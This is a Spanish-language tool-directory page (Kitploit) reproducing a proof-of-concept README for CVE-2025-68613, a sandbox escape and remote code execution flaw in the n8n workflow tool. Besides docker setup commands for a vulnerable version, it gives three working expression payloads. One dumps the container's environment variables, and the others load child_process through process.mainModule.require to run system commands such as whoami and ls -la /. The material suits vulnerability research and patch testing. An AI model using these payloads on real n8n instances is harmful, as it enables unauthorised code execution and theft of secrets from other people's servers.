Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc_CVE-2025-68613 — PoC para CVE-2025-68613 | Kitploit
Herramientas/GitHubGitHub/reem-012/poc_cve-2025-68613
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubreem-012/poc_cve-2025-68613

poc_CVE-2025-68613

PoC para CVE-2025-68613

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC: Escape del Sandbox de n8n (CVE-2025-68613)

Solo con Fines Educativos Esta Prueba de Concepto demuestra una vulnerabilidad crítica (CVE-2025-68613) en n8n. No la utilices en sistemas que no te pertenezcan o para los cuales no tengas permiso explícito de prueba.

Resumen de la Vulnerabilidad

Las versiones de n8n anteriores a la 1.122.0 contienen una vulnerabilidad de Ejecución Remota de Código (RCE). Los usuarios autenticados pueden eludir el sandbox de expresiones y ejecutar código arbitrario en el sistema host mediante payloads específicos de JavaScript en el editor de expresiones del flujo de trabajo.

1. Configurar el Entorno Vulnerable

Crea un volumen de datos y ejecuta una versión vulnerable de n8n (p. ej., v1.120.0).

root@kitploit:~
# Crear volumen para persistencia
docker volume create n8n_data

# Ejecutar instancia vulnerable de n8n
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  -v n8n_data:/home/node/.n8n \
  n8nio/n8n:1.120.0

2. Pasos de Reproducción

Acceder a la Interfaz

Navega a http://localhost:5678 y completa la configuración inicial si es necesario.

Crear un Flujo de Trabajo

Haz clic en "Add Workflow" para iniciar un flujo de trabajo en blanco.

Añadir un Nodo Vulnerable

Añade un nodo Set al flujo de trabajo. Este nodo nos permite definir valores que pueden evaluarse como expresiones.

Configurar la Expresión

En el nodo Set, modifica un parámetro (p. ej., value) y cambia el tipo de entrada a Expression.

3. Payloads de Explotación

Introduce los siguientes payloads en el editor de expresiones para demostrar la vulnerabilidad.

Payload 1: Volcado de Variables de Entorno

Este payload accede a this.process.env para filtrar variables de entorno sensibles del contenedor.

Payload:

root@kitploit:~
{{ (function() {
  return JSON.stringify(this.process.env, null, 2);
})() }}

Resultado:

Payload 2: Ejecución Remota de Código (whoami)

Este payload evade el sandbox accediendo a process.mainModule.require para cargar el módulo child_process, lo que permite ejecutar comandos arbitrarios del sistema.

Payload:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('whoami').toString();
})() }}

Resultado: Verifica el contexto de usuario del proceso en ejecución.

Payload 3: RCE Completa (Listar Directorio Raíz)

Demuestra la capacidad de explorar el sistema de archivos.

Payload:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('ls -la /').toString();
})() }}

Resultado:

Descargar herramienta